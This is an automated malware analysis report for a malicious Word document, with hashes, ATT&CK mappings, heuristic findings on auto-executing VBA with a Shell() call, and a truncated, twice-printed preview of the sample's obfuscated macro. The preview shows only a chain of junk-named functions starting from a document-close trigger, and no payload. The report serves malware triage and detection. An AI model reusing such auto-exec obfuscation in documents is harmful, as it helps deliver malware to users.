Office (OLE) malware analysis — malicious · c8c9873e9ce65756

MALICIOUS

Office (OLE)

556.5 KB Created: 2017-06-19 19:49:00 Authoring application: Microsoft Office Word First seen: 2017-12-09

MD5: f75ba0ad809d621bb7018cf843fac0a3 SHA-1: eb2201736d58c2fd35105b2e6f9068d25975efb6 SHA-256: c8c9873e9ce65756fe14755535b1ddf4e66956fa6739461071f7cf8d67873cc2

150 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

This OLE document contains VBA macros that trigger an auto-open event and utilize the Shell() function. The presence of the Shell() call and the auto-execution marker strongly suggest the macro is designed to execute arbitrary code, likely to download and run a second-stage payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 401678 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	401678 bytes
SHA-256: `b9c3b42482dd2b3735c7cb3a7a97600ac2c5f10a171655ba5c7e19a3c37c07f5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Sub doCUment_CLOse(): Call EVFVWOXONNLR: End Sub Sub EVFVWOXONNLR() Call YWQIDHKZJGYI End Sub Private Function YWQIDHKZJGYI() As Double Call VIGLUXFWTSGT End Function Sub VIGLUXFWTSGT() Call XTQZGHSZWVBH End Sub Sub XTQZGHSZWVBH() Call WJKQGVNDOUHD End Sub Static Sub WJKQGVNDOUHD() Call CMZMWCSRFMSN End Sub Static Sub CMZMWCSRFMSN() Call EYFDTNQNZYJS End Sub Private Function EYFDTNQNZYJS() As Currency Call DFRLGBPLDCAZ End Function Private Function DFRLGBPLDCAZ() As Byte Call QQYYECGEKBPO End Function Sub QQYYECGEKBPO() Call JUREEWEWWTWR End Sub Function JUREEWEWWTWR() As Long Call WQSSVWQKQEAR End Function Function WQSSVWQKQEAR() As Currency Call RUFRLOBBUIMR End Function Function RUFRLOBBUIMR() As Boolean Call YJFKWTBCGHMA End Function Static Function YJFKWTBCGHMA() As Date Call EPCZEARYMYRX End Function Static Function EPCZEARYMYRX() As Variant Call OAOTNDUSCKBP End Function Private Function OAOTNDUSCKBP() As Object Call GBELEZSDFQKI End Function Private Function GBELEZSDFQKI() As Variant Call IVVJCJANXOVL End Function Function IVVJCJANXOVL() As Object Call USSAFLXTJGUB End Function Private Function USSAFLXTJGUB() As Currency Call QNYQICOEYRRN End Function Static Function QNYQICOEYRRN() As Boolean Call KVUJPULDRVYB End Function Function KVUJPULDRVYB() As Variant Call BJAELRPCYURW End Function Static Function BJAELRPCYURW() As Byte Call ZIAFYGEMFMOG End Function Sub ZIAFYGEMFMOG() Call ZDXJGTYWEXUM End Sub Private Function ZDXJGTYWEXUM() As Variant Call QHVUQPHOXCXT End Function Static Sub QHVUQPHOXCXT() Call UPOMKXIDVCYH End Sub Function UPOMKXIDVCYH() As Boolean Call MBXFVTCJLSVM End Function Private Function MBXFVTCJLSVM() As Byte Call KKFPUIMZGFIK End Function Static Sub KKFPUIMZGFIK() Call XLFTFIIMZKHK End Sub Private Sub XLFTFIIMZKHK() Call DIVYBPDBRHWT End Sub Static Sub DIVYBPDBRHWT() Call AMESGEESMZNQ End Sub Function AMESGEESMZNQ() As Long Call JFGYAICAHKMJ End Function Private Sub JFGYAICAHKMJ() Call TDIVNMLHAPHC End Sub Static Sub TDIVNMLHAPHC() Call NULYHFDMIOEE End Sub Function NULYHFDMIOEE() As Currency Call XAYBWHVGYFTV End Function Function XAYBWHVGYFTV() As Currency Call KSRVVHWNDQCH End Function Function KSRVVHWNDQCH() As Double Call QMULKPROWXSU End Function Sub QMULKPROWXSU() Call FIQSRMSBJUAQ End Sub Static Function FIQSRMSBJUAQ() As String Call VFCXAKRGFNKZ End Function Static Sub VFCXAKRGFNKZ() Call NXLGEFVLUYCF End Sub Static Sub NXLGEFVLUYCF() Call VZVWKJOZDDRL End Sub Static Function VZVWKJOZDDRL() As Object Call FZIJFMXUUAKC End Function Function FZIJFMXUUAKC() As Long Call IYZXXWODLSRF End Function Private Function IYZXXWODLSRF() As Boolean Call EPXUHNVHLETE End Function Sub EPXUHNVHLETE() Call JNJCOVBPUJED End Sub Sub JNJCOVBPUJED() Call HILMHKGABHFM End Sub Static Sub HILMHKGABHFM() Call WJFLIIQMMZJJ End Sub Static Function WJFLIIQMMZJJ() As Double Call XZUVYUZPXLVC End Function Private Sub XZUVYUZPXLVC() Call FFMFWZDKVPEW End Sub Static Function FFMFWZDKVPEW() As Currency Call RTBMNAFKSOOY End Function Function RTBMNAFKSOOY() As Integer Call TWATXLIAYGPO End Function Private Function TWATXLIAYGPO() As Date Call YMESTTTCTRKA End Function Sub YMESTTTCTRKA() Call DOYUTCKRRWQN End Sub Function DOYUTCKRRWQN() As Currency Call JHGGXIUZTUKJ End Function Static Function JHGGXIUZTUKJ() As Single Call YMJYQGPTUMIU End Function Static Sub YMJYQGPTUMIU() Call IBDLRKDTZXNZ End Sub Private Function IBDLRKDTZXNZ() As Double Call IBZFTWHDYDPF End Function Static Sub IBZFTWHDYDPF() Call KYYXKHZTFAUV End Sub Function KYYXKHZTFAUV() As Object Call EVBQYABXLTNY End Function Function EVBQYABXLTNY() As Date Call SJLRFZRXBFBW End Function Sta ... (truncated)

SHA-256: b9c3b42482dd2b3735c7cb3a7a97600ac2c5f10a171655ba5c7e19a3c37c07f5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub doCUment_CLOse(): Call EVFVWOXONNLR: End Sub
Sub EVFVWOXONNLR()
Call YWQIDHKZJGYI
End Sub
Private Function YWQIDHKZJGYI() As Double
Call VIGLUXFWTSGT
End Function
Sub VIGLUXFWTSGT()
Call XTQZGHSZWVBH
End Sub
Sub XTQZGHSZWVBH()
Call WJKQGVNDOUHD
End Sub
Static Sub WJKQGVNDOUHD()
Call CMZMWCSRFMSN
End Sub
Static Sub CMZMWCSRFMSN()
Call EYFDTNQNZYJS
End Sub
Private Function EYFDTNQNZYJS() As Currency
Call DFRLGBPLDCAZ
End Function
Private Function DFRLGBPLDCAZ() As Byte
Call QQYYECGEKBPO
End Function
Sub QQYYECGEKBPO()
Call JUREEWEWWTWR
End Sub
Function JUREEWEWWTWR() As Long
Call WQSSVWQKQEAR
End Function
Function WQSSVWQKQEAR() As Currency
Call RUFRLOBBUIMR
End Function
Function RUFRLOBBUIMR() As Boolean
Call YJFKWTBCGHMA
End Function
Static Function YJFKWTBCGHMA() As Date
Call EPCZEARYMYRX
End Function
Static Function EPCZEARYMYRX() As Variant
Call OAOTNDUSCKBP
End Function
Private Function OAOTNDUSCKBP() As Object
Call GBELEZSDFQKI
End Function
Private Function GBELEZSDFQKI() As Variant
Call IVVJCJANXOVL
End Function
Function IVVJCJANXOVL() As Object
Call USSAFLXTJGUB
End Function
Private Function USSAFLXTJGUB() As Currency
Call QNYQICOEYRRN
End Function
Static Function QNYQICOEYRRN() As Boolean
Call KVUJPULDRVYB
End Function
Function KVUJPULDRVYB() As Variant
Call BJAELRPCYURW
End Function
Static Function BJAELRPCYURW() As Byte
Call ZIAFYGEMFMOG
End Function
Sub ZIAFYGEMFMOG()
Call ZDXJGTYWEXUM
End Sub
Private Function ZDXJGTYWEXUM() As Variant
Call QHVUQPHOXCXT
End Function
Static Sub QHVUQPHOXCXT()
Call UPOMKXIDVCYH
End Sub
Function UPOMKXIDVCYH() As Boolean
Call MBXFVTCJLSVM
End Function
Private Function MBXFVTCJLSVM() As Byte
Call KKFPUIMZGFIK
End Function
Static Sub KKFPUIMZGFIK()
Call XLFTFIIMZKHK
End Sub
Private Sub XLFTFIIMZKHK()
Call DIVYBPDBRHWT
End Sub
Static Sub DIVYBPDBRHWT()
Call AMESGEESMZNQ
End Sub
Function AMESGEESMZNQ() As Long
Call JFGYAICAHKMJ
End Function
Private Sub JFGYAICAHKMJ()
Call TDIVNMLHAPHC
End Sub
Static Sub TDIVNMLHAPHC()
Call NULYHFDMIOEE
End Sub
Function NULYHFDMIOEE() As Currency
Call XAYBWHVGYFTV
End Function
Function XAYBWHVGYFTV() As Currency
Call KSRVVHWNDQCH
End Function
Function KSRVVHWNDQCH() As Double
Call QMULKPROWXSU
End Function
Sub QMULKPROWXSU()
Call FIQSRMSBJUAQ
End Sub
Static Function FIQSRMSBJUAQ() As String
Call VFCXAKRGFNKZ
End Function
Static Sub VFCXAKRGFNKZ()
Call NXLGEFVLUYCF
End Sub
Static Sub NXLGEFVLUYCF()
Call VZVWKJOZDDRL
End Sub
Static Function VZVWKJOZDDRL() As Object
Call FZIJFMXUUAKC
End Function
Function FZIJFMXUUAKC() As Long
Call IYZXXWODLSRF
End Function
Private Function IYZXXWODLSRF() As Boolean
Call EPXUHNVHLETE
End Function
Sub EPXUHNVHLETE()
Call JNJCOVBPUJED
End Sub
Sub JNJCOVBPUJED()
Call HILMHKGABHFM
End Sub
Static Sub HILMHKGABHFM()
Call WJFLIIQMMZJJ
End Sub
Static Function WJFLIIQMMZJJ() As Double
Call XZUVYUZPXLVC
End Function
Private Sub XZUVYUZPXLVC()
Call FFMFWZDKVPEW
End Sub
Static Function FFMFWZDKVPEW() As Currency
Call RTBMNAFKSOOY
End Function
Function RTBMNAFKSOOY() As Integer
Call TWATXLIAYGPO
End Function
Private Function TWATXLIAYGPO() As Date
Call YMESTTTCTRKA
End Function
Sub YMESTTTCTRKA()
Call DOYUTCKRRWQN
End Sub
Function DOYUTCKRRWQN() As Currency
Call JHGGXIUZTUKJ
End Function
Static Function JHGGXIUZTUKJ() As Single
Call YMJYQGPTUMIU
End Function
Static Sub YMJYQGPTUMIU()
Call IBDLRKDTZXNZ
End Sub
Private Function IBDLRKDTZXNZ() As Double
Call IBZFTWHDYDPF
End Function
Static Sub IBZFTWHDYDPF()
Call KYYXKHZTFAUV
End Sub
Function KYYXKHZTFAUV() As Object
Call EVBQYABXLTNY
End Function
Function EVBQYABXLTNY() As Date
Call SJLRFZRXBFBW
End Function
Sta
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.